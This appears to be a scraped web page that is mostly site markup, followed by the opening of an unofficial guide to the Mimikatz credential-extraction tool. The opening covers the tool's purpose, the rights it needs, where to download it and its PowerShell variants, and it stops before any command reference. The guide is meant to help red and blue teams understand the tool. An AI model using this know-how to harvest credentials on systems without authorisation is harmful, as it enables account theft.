CINXE.COM

Mimikatz – Active Directory Security

<!DOCTYPE html><!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Mimikatz &#8211; Active Directory Security</title> <meta name='robots' content='max-image-preview:large' /> <link rel="alternate" type="application/rss+xml" title="Active Directory Security &raquo; Feed" href="https://adsecurity.org/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="Active Directory Security &raquo; Comments Feed" href="https://adsecurity.org/?feed=comments-rss2" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/adsecurity.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://adsecurity.org/wp-includes/css/dist/block-library/style.min.css?ver=6.5.5' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 14px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 20px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--tiny: 10px;--wp--preset--font-size--regular: 16px;--wp--preset--font-size--larger: 26px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} .wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} .wp-block-pullquote{font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='bootstrap-css' href='https://adsecurity.org/wp-content/themes/graphene/bootstrap/css/bootstrap.min.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://adsecurity.org/wp-content/themes/graphene/fonts/font-awesome/css/font-awesome.min.css?ver=6.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='graphene-css' href='https://adsecurity.org/wp-content/themes/graphene/style.css?ver=2.8.4' type='text/css' media='screen' /> <link rel='stylesheet' id='graphene-responsive-css' href='https://adsecurity.org/wp-content/themes/graphene/responsive.css?ver=2.8.4' type='text/css' media='all' /> <link rel='stylesheet' id='graphene-blocks-css' href='https://adsecurity.org/wp-content/themes/graphene/blocks.css?ver=2.8.4' type='text/css' media='all' /> <script type="text/javascript" src="https://adsecurity.org/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://adsecurity.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/bootstrap/js/bootstrap.min.js?ver=2.8.4" id="bootstrap-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/bootstrap-hover-dropdown/bootstrap-hover-dropdown.min.js?ver=2.8.4" id="bootstrap-hover-dropdown-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/bootstrap-submenu/bootstrap-submenu.min.js?ver=2.8.4" id="bootstrap-submenu-js"></script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/jquery.infinitescroll.min.js?ver=2.8.4" id="infinite-scroll-js"></script> <script type="text/javascript" id="graphene-js-extra"> /* <![CDATA[ */ var grapheneJS = {"siteurl":"https:\/\/adsecurity.org","ajaxurl":"https:\/\/adsecurity.org\/wp-admin\/admin-ajax.php","templateUrl":"https:\/\/adsecurity.org\/wp-content\/themes\/graphene","isSingular":"1","enableStickyMenu":"","shouldShowComments":"1","commentsOrder":"newest","sliderDisable":"","sliderInterval":"7000","infScrollBtnLbl":"Load more","infScrollOn":"","infScrollCommentsOn":"","totalPosts":"1","postsPerPage":"10","isPageNavi":"","infScrollMsgText":"Fetching window.grapheneInfScrollItemsPerPage of window.grapheneInfScrollItemsLeft items left ...","infScrollMsgTextPlural":"Fetching window.grapheneInfScrollItemsPerPage of window.grapheneInfScrollItemsLeft items left ...","infScrollFinishedText":"All loaded!","commentsPerPage":"50","totalComments":"0","infScrollCommentsMsg":"Fetching window.grapheneInfScrollCommentsPerPage of window.grapheneInfScrollCommentsLeft comments left ...","infScrollCommentsMsgPlural":"Fetching window.grapheneInfScrollCommentsPerPage of window.grapheneInfScrollCommentsLeft comments left ...","infScrollCommentsFinishedMsg":"All comments loaded!","disableLiveSearch":"1","txtNoResult":"No result found.","isMasonry":""}; /* ]]> */ </script> <script defer type="text/javascript" src="https://adsecurity.org/wp-content/themes/graphene/js/graphene.js?ver=2.8.4" id="graphene-js"></script> <script type="text/javascript" id="wpstg-global-js-extra"> /* <![CDATA[ */ var wpstg = {"nonce":"23dea5be61"}; /* ]]> */ </script> <script type="text/javascript" src="https://adsecurity.org/wp-content/plugins/wp-staging-pro/assets/js/dist/wpstg-blank-loader.min.js?ver=6.5.5" id="wpstg-global-js"></script> <link rel="https://api.w.org/" href="https://adsecurity.org/index.php?rest_route=/" /><link rel="alternate" type="application/json" href="https://adsecurity.org/index.php?rest_route=/wp/v2/pages/1821" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://adsecurity.org/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.5.5" /> <link rel="canonical" href="https://adsecurity.org/?page_id=1821" /> <link rel='shortlink' href='https://adsecurity.org/?p=1821' /> <link rel="alternate" type="application/json+oembed" href="https://adsecurity.org/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=https%3A%2F%2Fadsecurity.org%2F%3Fpage_id%3D1821" /> <link rel="alternate" type="text/xml+oembed" href="https://adsecurity.org/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=https%3A%2F%2Fadsecurity.org%2F%3Fpage_id%3D1821&#038;format=xml" /> <script> WebFontConfig = { google: { families: ["Lato:400,400i,700,700i&display=swap"] } }; (function(d) { var wf = d.createElement('script'), s = d.scripts[0]; wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'; wf.async = true; s.parentNode.insertBefore(wf, s); })(document); </script> <style type="text/css"> .header_title, .header_title a, .header_title a:visited, .header_title a:hover, .header_desc {color:#000000}.carousel, .carousel .item{height:400px}@media (max-width: 991px) {.carousel, .carousel .item{height:250px}}#header{max-height:198px}@media (min-width: 1200px) {.container {width:1280px}} </style> <script type="application/ld+json">{"@context":"http:\/\/schema.org","@type":"WebPage","mainEntityOfPage":"https:\/\/adsecurity.org\/?page_id=1821","publisher":{"@type":"Organization","name":"Active Directory Security"},"headline":"Mimikatz","datePublished":"2015-09-20T09:00:15+00:00","dateModified":"2018-02-17T15:10:25+00:00","description":"Unofficial Guide to Mimikatz &amp; Command Reference Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017 Page last updated: February 17th, 2018 Introduction: It seems like many people on both sides of the fence, Red &amp; Blue, aren't familiar with most of Mimikatz's capabilities, so I put together this information on all ...","author":{"@type":"Person","name":"Sean Metcalf"},"image":["https:\/\/adsecurity.org\/wp-content\/uploads\/2017\/11\/Mimikatz-DPAPI-Protect.png","https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-Trust.png","https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-Secrets.png"]}</script> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><meta property="og:type" content="article" /> <meta property="og:title" content="Mimikatz" /> <meta property="og:url" content="https://adsecurity.org/?page_id=1821" /> <meta property="og:site_name" content="Active Directory Security" /> <meta property="og:description" content="Unofficial Guide to Mimikatz &amp; Command Reference Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017 Page last updated: February 17th, 2018 Introduction: It seems like many people on both sides of the fence, Red &amp; Blue, aren&#039;t familiar with most of Mimikatz&#039;s capabilities, so I put together this information on all ..." /> <meta property="og:updated_time" content="2018-02-17T15:10:25+00:00" /> <meta property="article:modified_time" content="2018-02-17T15:10:25+00:00" /> <meta property="article:published_time" content="2015-09-20T09:00:15+00:00" /> <meta property="og:image" content="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push.jpg" /> <meta property="og:image:width" content="1186" /> <meta property="og:image:height" content="630" /> </head> <body class="page-template-default page page-id-1821 custom-background wp-embed-responsive layout-boxed two_col_left two-columns singular"> <div class="container boxed-wrapper"> <div id="top-bar" class="row clearfix top-bar "> <div class="col-md-12 top-bar-items"> <ul class="social-profiles"> <li class="social-profile social-profile-rss"> <a href="https://adsecurity.org/?feed=rss2" title="Subscribe to Tech, News, and Other Ideations&#039;s RSS feed" id="social-id-1" class="mysocial social-rss"> <i class="fa fa-rss"></i> </a> </li> </ul> <button type="button" class="search-toggle navbar-toggle collapsed" data-toggle="collapse" data-target="#top_search"> <span class="sr-only">Toggle search form</span> <i class="fa fa-search-plus"></i> </button> <div id="top_search" class="top-search-form"> <form class="searchform" method="get" action="https://adsecurity.org"> <div class="input-group"> <div class="form-group live-search-input"> <label for="s" class="screen-reader-text">Search for:</label> <input type="text" id="s" name="s" class="form-control" placeholder="Search"> </div> <span class="input-group-btn"> <button class="btn btn-default" type="submit"><i class="fa fa-search"></i></button> </span> </div> </form> </div> </div> </div> <div id="header" class="row"> <img src="https://adsecurity.org/wp-content/themes/graphene/images/headers/fluid.jpg" alt="Active Directory Security" title="Active Directory Security" width="960" height="198" /> </div> <nav class="navbar row navbar-inverse"> <div class="navbar-header align-center"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#header-menu-wrap, #secondary-menu-wrap"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <p class="header_title"> <a href="https://adsecurity.org" title="Go back to the front page"> Active Directory Security </a> </p> <p class="header_desc">Active Directory &amp; Enterprise Security, Methods to Secure Active Directory, Attack Methods &amp; Effective Defenses, PowerShell, Tech Notes, &amp; Geek Trivia&#8230;</p> </div> <div class="collapse navbar-collapse" id="header-menu-wrap"> <ul class="nav navbar-nav flip"><li ><a href="https://adsecurity.org/">Home</a></li><li class="menu-item menu-item-8"><a href="https://adsecurity.org/?page_id=8" >About</a></li><li class="menu-item menu-item-41"><a href="https://adsecurity.org/?page_id=41" >AD Resources</a></li><li class="menu-item menu-item-4031"><a href="https://adsecurity.org/?page_id=4031" >Attack Defense &#038; Detection</a></li><li class="menu-item menu-item-293"><a href="https://adsecurity.org/?page_id=293" >Contact</a></li><li class="menu-item menu-item-1821 current-menu-item"><a href="https://adsecurity.org/?page_id=1821" >Mimikatz</a></li><li class="menu-item menu-item-1352"><a href="https://adsecurity.org/?page_id=1352" >Presentations</a></li><li class="menu-item menu-item-195"><a href="https://adsecurity.org/?page_id=195" >Schema Versions</a></li><li class="menu-item menu-item-399"><a href="https://adsecurity.org/?page_id=399" >Security Resources</a></li><li class="menu-item menu-item-183"><a href="https://adsecurity.org/?page_id=183" >SPNs</a></li><li class="menu-item menu-item-2532"><a href="https://adsecurity.org/?page_id=2532" >Top Posts</a></li></ul> </div> </nav> <div id="content" class="clearfix hfeed row"> <div id="content-main" class="clearfix content-main col-md-8"> <div id="post-1821" class="clearfix post post-1821 page type-page status-publish hentry nodate item-wrap"> <div class="entry clearfix"> <h1 class="post-title entry-title"> Mimikatz </h1> <div class="entry-content clearfix"> <h1><span style="text-decoration: underline;"><strong>Unofficial Guide to Mimikatz &amp; Command Reference</strong></span></h1> <h5><img fetchpriority="high" decoding="async" class="alignnone wp-image-3815" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28.png" alt="" width="607" height="149" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28.png 1140w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28-300x73.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28-768x188.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-LoadScreen-211-2017-11-28-1024x251.png 1024w" sizes="(max-width: 607px) 100vw, 607px" /></h5> <h5>Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017<br /> <em>Page last updated: February 17th, 2018</em></h5> <h3><span style="text-decoration: underline;"><strong>Introduction:</strong></span></h3> <p>It seems like many people on both sides of the fence, Red &amp; Blue, aren&#8217;t familiar with most of Mimikatz&#8217;s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red &amp; Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect.</p> <p>I developed this reference after speaking with a lot of people, hired to both defend and attack networks, I learned that outside of a few of the mot frequently used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required &amp; optional), as well as screenshots and additional context (where possible). There are several I haven&#8217;t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible. With that noted, <em>this page will never be as up-to-date as the <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz github</a>. The best Mimikatz documentation is the source code. </em></p> <p><em>This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don&#8217;t own or have been allowed/approved to. In other words, don&#8217;t pen-test/red-team systems with Mimikatz without a &#8220;get out of jail free card&#8221;.</em></p> <p>This page and all content contained within is not to be reproduced in whole or part without <a href="https://adsecurity.org/?page_id=293">express written consent by this page&#8217;s author</a>.<br /> I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his Twitter, blog &amp; GitHub pages, and my own work/research.<br /> Any errors on this page are my own only. <a href="https://adsecurity.org/?page_id=293">Send comments/kudus here.</a></p> <p>Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially <a href="https://adsecurity.org/?p=1535">Windows 10</a>.</p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Mimikatz Overview:</strong></span></h3> <p>Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on <a href="http://blog.gentilkiwi.com/">his blog</a>. The <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz GitHub repository</a> is in English and includes useful information on command usage.</p> <p>Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, <em>mimidrv</em> (driver to interact with the Windows kernal) and <em>mimilib</em> (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there.</p> <p>Mimikatz capability can be leveraged by <a href="https://github.com/gentilkiwi/mimikatz">compiling and running your own version</a>, running the <a href="https://github.com/gentilkiwi/mimikatz/releases">Mimikatz executable</a>, leveraging the <a href="https://www.offensive-security.com/metasploit-unleashed/mimikatz/">MetaSploit script</a>, the <a href="https://github.com/PowerShellMafia/PowerSploit">official Invoke-Mimikatz PowerShell version</a>, or one of the dozen of Mimikatz PowerShell variants (I happen to be partial to <a href="https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1">PowerShell Empire</a>, because Empire is awesome!).</p> <p>The Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons with the following detail:<br /> <em>You are free to:</em><br /> <em> *  Share — copy and redistribute the material in any medium or format</em><br /> <em> *  Adapt — remix, transform, and build upon the material</em><br /> <em> *  for any purpose, even commercially.</em><br /> <em> The licensor cannot revoke these freedoms as long as you follow the license terms.</em><br /> <em> Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.</em><br /> <em> No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.</em></p> <h4><strong><span style="text-decoration: underline;">Mimikatz Author(s):</span></strong></h4> <ul> <li>Benjamin DELPY <code>gentilkiwi</code>, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )</li> <li>DCSync function in <code>lsadump</code> module was co-written with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( <a href="http://www.mysmartlogon.com">http://www.mysmartlogon.com</a> )</li> </ul> <h4><strong><span style="text-decoration: underline;"><br /> &#8220;Official&#8221; Mimikatz Links:</span></strong></h4> <p><a href="https://github.com/gentilkiwi/mimikatz">Mimikatz GitHub Location</a> (Source Code)</p> <p><a href="https://github.com/gentilkiwi/mimikatz/releases">Mimikatz Releases</a> (includes binaries)</p> <p><a href="https://github.com/gentilkiwi/mimikatz/wiki">Mimikatz GitHub Wiki</a> (Documentation, some of which is reproduced here)</p> <p><a href="http://blog.gentilkiwi.com/mimikatz">GentilKiwi Blog</a> (much of it is in French, use Chrome/other for translation)</p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Mimikatz &amp; Credentials:</strong></span></h3> <p>After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, <a 